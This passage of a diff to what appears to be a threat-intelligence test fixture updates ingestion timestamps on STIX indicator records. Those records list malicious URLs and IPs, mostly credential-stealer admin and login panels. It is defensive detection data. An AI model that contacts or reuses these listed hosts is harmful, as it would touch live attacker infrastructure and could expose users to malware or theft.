"2021-12-13T08:38:40.023794500Z", + "ingested": "2021-12-14T14:57:43.118251309Z", "original": "{\"created\":\"2020-01-28T03:01:31.533Z\",\"description\":\"TS ID: 55263241845; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--1d0c2a7c-ba78-4e9f-ae7a-4ce2988357b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-28T03:01:31.533Z\",\"name\":\"mal_url: http://149.28.199.128/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://149.28.199.128/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:31.533Z\"}", "category": "threat", "type": "indicator", @@ -10621,7 +10621,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023799700Z", + "ingested": "2021-12-14T14:57:43.118251762Z", "original": "{\"created\":\"2020-01-29T02:59:29.937Z\",\"description\":\"TS ID: 55266539002; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b78ae5fd-ee1e-49ab-9519-fb62ba1bb26a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T02:59:29.937Z\",\"name\":\"mal_url: http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T02:59:29.937Z\"}", "category": "threat", "type": "indicator", @@ -10673,7 +10673,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023805Z", + "ingested": "2021-12-14T14:57:43.118252152Z", "original": "{\"created\":\"2020-01-29T03:00:21.905Z\",\"description\":\"TS ID: 55266539006; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ec4322a7-481b-4787-8df2-e3b3bc0c8b8b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:00:21.905Z\",\"name\":\"mal_url: http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:21.905Z\"}", "category": "threat", "type": "indicator", @@ -10725,7 +10725,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023809300Z", + "ingested": "2021-12-14T14:57:43.118252539Z", "original": "{\"created\":\"2020-01-29T03:00:29.782Z\",\"description\":\"TS ID: 55266539008; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--cc172be8-7e67-489c-8bd8-8e9ffc11a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-29T03:00:29.782Z\",\"name\":\"mal_url: http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:29.782Z\"}", "category": "threat", "type": "indicator", @@ -10776,7 +10776,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023813800Z", + "ingested": "2021-12-14T14:57:43.118253030Z", "original": "{\"created\":\"2020-01-29T03:00:38.132Z\",\"description\":\"TS ID: 55266538988; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6cb1c4c4-93cb-4ad9-b176-e2a47febafac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-29T03:00:38.132Z\",\"name\":\"mal_url: http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:38.132Z\"}", "category": "threat", "type": "indicator", @@ -10828,7 +10828,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023817400Z", + "ingested": "2021-12-14T14:57:43.118253465Z", "original": "{\"created\":\"2020-01-29T03:00:38.721Z\",\"description\":\"TS ID: 55266538999; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--42f95e09-bad2-4055-bf72-fd3d1f26a173\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:00:38.721Z\",\"name\":\"mal_url: http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:38.721Z\"}", "category": "threat", "type": "indicator", @@ -10880,7 +10880,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023822500Z", + "ingested": "2021-12-14T14:57:43.118253860Z", "original": "{\"created\":\"2020-01-29T03:00:51.527Z\",\"description\":\"TS ID: 55266539012; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b9eafbc4-77e3-4b9b-bd34-a15681f0bbec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-29T03:00:51.527Z\",\"name\":\"mal_url: http://corpcougar.com/me/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/me/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:51.527Z\"}", "category": "threat", "type": "indicator", @@ -10932,7 +10932,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023829900Z", + "ingested": "2021-12-14T14:57:43.118254249Z", "original": "{\"created\":\"2020-01-29T03:01:05.442Z\",\"description\":\"TS ID: 55266539004; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--9a6acfec-ffa7-47c7-8176-7dbaca7b379f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:01:05.442Z\",\"name\":\"mal_url: http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:05.442Z\"}", "category": "threat", "type": "indicator", @@ -10977,7 +10977,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023834600Z", + "ingested": "2021-12-14T14:57:43.118254792Z", "original": "{\"created\":\"2020-01-29T03:01:13.933Z\",\"description\":\"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--5384d504-8760-4255-8daa-dd156dc302d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-29T03:01:13.933Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:13.933Z\"}", "category": "threat", "type": "indicator", @@ -11029,7 +11029,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023840600Z", + "ingested": "2021-12-14T14:57:43.118255232Z", "original": "{\"created\":\"2020-01-29T03:01:31.192Z\",\"description\":\"TS ID: 55266539003; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--56b347c9-58c9-48d5-a015-2d561d855af2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:01:31.192Z\",\"name\":\"mal_url: http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:31.192Z\"}", "category": "threat", "type": "indicator", @@ -11081,7 +11081,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023846500Z", + "ingested": "2021-12-14T14:57:43.118255667Z", "original": "{\"created\":\"2020-01-29T03:01:37.815Z\",\"description\":\"TS ID: 55266538992; iType: mal_url; State: active; Org: Exa Bytes Network Sdn.Bhd.; Source: CyberCrime\",\"id\":\"indicator--840739fb-44ae-42f0-805f-422b38422325\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-29T03:01:37.815Z\",\"name\":\"mal_url: http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:37.815Z\"}", "category": "threat", "type": "indicator", @@ -11133,7 +11133,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023852100Z", + "ingested": "2021-12-14T14:57:43.118256155Z", "original": "{\"created\":\"2020-01-29T03:01:49.96Z\",\"description\":\"TS ID: 55266539011; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--9ab8a69c-5b95-4fd6-b189-11d90ee54834\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-29T03:01:49.96Z\",\"name\":\"mal_url: http://rgmechanics.fun/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rgmechanics.fun/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:49.96Z\"}", "category": "threat", "type": "indicator", @@ -11185,7 +11185,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023855900Z", + "ingested": "2021-12-14T14:57:43.118256653Z", "original": "{\"created\":\"2020-01-29T03:02:14.284Z\",\"description\":\"TS ID: 55266539013; iType: mal_url; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--96051c6b-3648-43ba-b579-735bd6342ec2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-29T03:02:14.284Z\",\"name\":\"mal_url: http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:14.284Z\"}", "category": "threat", "type": "indicator", @@ -11237,7 +11237,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023859700Z", + "ingested": "2021-12-14T14:57:43.118257096Z", "original": "{\"created\":\"2020-01-29T03:02:24.081Z\",\"description\":\"TS ID: 55266539001; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d76d300b-07b7-4e9b-b7f1-9e6c0def6a6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:24.081Z\",\"name\":\"mal_url: http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:24.081Z\"}", "category": "threat", "type": "indicator", @@ -11289,7 +11289,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023863700Z", + "ingested": "2021-12-14T14:57:43.118257555Z", "original": "{\"created\":\"2020-01-29T03:02:31.573Z\",\"description\":\"TS ID: 55266539009; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--3c61c714-aab6-46e2-abfd-389628870d7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-29T03:02:31.573Z\",\"name\":\"mal_url: http://v200598.hosted-by-vdsina.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://v200598.hosted-by-vdsina.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:31.573Z\"}", "category": "threat", "type": "indicator", @@ -11341,7 +11341,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023869Z", + "ingested": "2021-12-14T14:57:43.118258021Z", "original": "{\"created\":\"2020-01-29T03:02:31.605Z\",\"description\":\"TS ID: 55266539007; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--3c9a39df-b4f3-4529-bfd8-d8b40801e555\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:31.605Z\",\"name\":\"mal_url: http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:31.605Z\"}", "category": "threat", "type": "indicator", @@ -11386,7 +11386,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023873500Z", + "ingested": "2021-12-14T14:57:43.118258451Z", "original": "{\"created\":\"2020-01-29T03:02:41.021Z\",\"description\":\"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-29T03:02:41.021Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:41.021Z\"}", "category": "threat", "type": "indicator", @@ -11438,7 +11438,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023878Z", + "ingested": "2021-12-14T14:57:43.118258835Z", "original": "{\"created\":\"2020-01-29T03:02:42.284Z\",\"description\":\"TS ID: 55266539010; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--e34dc439-4789-4d5a-b7dc-471fb473f4a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-29T03:02:42.284Z\",\"name\":\"mal_url: http://v178903.hosted-by-vdsina.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://v178903.hosted-by-vdsina.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.284Z\"}", "category": "threat", "type": "indicator", @@ -11490,7 +11490,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023881600Z", + "ingested": "2021-12-14T14:57:43.118259270Z", "original": "{\"created\":\"2020-01-29T03:02:42.335Z\",\"description\":\"TS ID: 55266538994; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--a30fe926-53b8-43fe-a792-8ecd41071dd7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-29T03:02:42.335Z\",\"name\":\"mal_url: http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.335Z\"}", "category": "threat", "type": "indicator", @@ -11542,7 +11542,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023886900Z", + "ingested": "2021-12-14T14:57:43.118259776Z", "original": "{\"created\":\"2020-01-29T03:02:42.367Z\",\"description\":\"TS ID: 55266538986; iType: mal_url; State: active; Org: Eonix Corporation; Source: CyberCrime\",\"id\":\"indicator--0005f77c-327b-4b69-8046-777efe95361d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-29T03:02:42.367Z\",\"name\":\"mal_url: http://microsoftrenat.site/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://microsoftrenat.site/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.367Z\"}", "category": "threat", "type": "indicator", @@ -11594,7 +11594,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023894300Z", + "ingested": "2021-12-14T14:57:43.118260169Z", "original": "{\"created\":\"2020-01-29T03:02:48.869Z\",\"description\":\"TS ID: 55266539005; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--2ef4b932-5434-49f4-8255-a70de96893d8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:48.869Z\",\"name\":\"mal_url: http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.869Z\"}", "category": "threat", "type": "indicator", @@ -11639,7 +11639,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023901700Z", + "ingested": "2021-12-14T14:57:43.118260557Z", "original": "{\"created\":\"2020-01-29T03:02:48.897Z\",\"description\":\"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-29T03:02:48.897Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.897Z\"}", "category": "threat", "type": "indicator", @@ -11690,7 +11690,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023906400Z", + "ingested": "2021-12-14T14:57:43.118261094Z", "original": "{\"created\":\"2020-01-30T02:58:32.284Z\",\"description\":\"TS ID: 55270319168; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--8da10219-9eb1-4963-8889-587598e511cd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-30T02:58:32.284Z\",\"name\":\"mal_url: http://www.cpadeer.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://www.cpadeer.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-30T02:58:32.284Z\"}", "category": "threat", "type": "indicator", @@ -11742,7 +11742,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023910600Z", + "ingested": "2021-12-14T14:57:43.118261549Z", "original": "{\"created\":\"2020-01-31T02:19:29.045Z\",\"description\":\"TS ID: 55274447486; iType: mal_url; State: active; Org: SingleHop LLC; Source: CyberCrime\",\"id\":\"indicator--093bf827-0d84-4b54-9d62-dffffd0a619b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-31T02:19:29.045Z\",\"name\":\"mal_url: http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-31T02:19:29.045Z\"}", "category": "threat", "type": "indicator", @@ -11794,7 +11794,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023915800Z", + "ingested": "2021-12-14T14:57:43.118261989Z", "original": "{\"created\":\"2020-01-31T02:22:09.726Z\",\"description\":\"TS ID: 55274447484; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--51d4eb13-adf7-4de1-a3f0-106d343ad560\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-31T02:22:09.726Z\",\"name\":\"mal_url: http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-31T02:22:09.726Z\"}", "category": "threat", "type": "indicator", @@ -11846,7 +11846,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023919900Z", + "ingested": "2021-12-14T14:57:43.118262424Z", "original": "{\"created\":\"2020-02-01T02:03:02.79Z\",\"description\":\"TS ID: 55277443309; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--a5926161-953c-4763-9d10-0c5e10bcd4e4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:03:02.79Z\",\"name\":\"mal_url: http://marubemi.com/owen/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://marubemi.com/owen/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:02.79Z\"}", "category": "threat", "type": "indicator", @@ -11891,7 +11891,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023926200Z", + "ingested": "2021-12-14T14:57:43.118263011Z", "original": "{\"created\":\"2020-02-01T02:03:07.047Z\",\"description\":\"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-02-01T02:03:07.047Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:07.047Z\"}", "category": "threat", "type": "indicator", @@ -11943,7 +11943,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023930100Z", + "ingested": "2021-12-14T14:57:43.118263450Z", "original": "{\"created\":\"2020-02-01T02:03:48.038Z\",\"description\":\"TS ID: 55277443373; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--8494f340-0964-47f0-ba09-78fe0b76eb34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:03:48.038Z\",\"name\":\"mal_url: http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:48.038Z\"}", "category": "threat", "type": "indicator", @@ -11995,7 +11995,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023935500Z", + "ingested": "2021-12-14T14:57:43.118263832Z", "original": "{\"created\":\"2020-02-01T02:03:48.079Z\",\"description\":\"TS ID: 55277443242; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f051e10a-76c9-4f14-9fa3-9dbccc65c26f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:03:48.079Z\",\"name\":\"mal_url: http://farzanatradings.com/maindon/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/maindon/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:48.079Z\"}", "category": "threat", "type": "indicator", @@ -12047,7 +12047,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023939400Z", + "ingested": "2021-12-14T14:57:43.118264230Z", "original": "{\"created\":\"2020-02-01T02:04:16.392Z\",\"description\":\"TS ID: 55277443446; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--79c8f52b-f134-4e02-ad7a-6169063c8fba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:04:16.392Z\",\"name\":\"mal_url: http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:16.392Z\"}", "category": "threat", "type": "indicator", @@ -12099,7 +12099,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023943600Z", + "ingested": "2021-12-14T14:57:43.118264610Z", "original": "{\"created\":\"2020-02-01T02:04:21.636Z\",\"description\":\"TS ID: 55277443452; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--7338fc3d-2a1f-4583-b34d-eb76912a43e6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-01T02:04:21.636Z\",\"name\":\"mal_url: http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.636Z\"}", "category": "threat", "type": "indicator", @@ -12150,7 +12150,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023948Z", + "ingested": "2021-12-14T14:57:43.118265068Z", "original": "{\"created\":\"2020-02-01T02:04:21.676Z\",\"description\":\"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1f9e0571-119c-448a-8656-fec49c9c058a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:04:21.676Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.676Z\"}", "category": "threat", "type": "indicator", @@ -12201,7 +12201,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023951500Z", + "ingested": 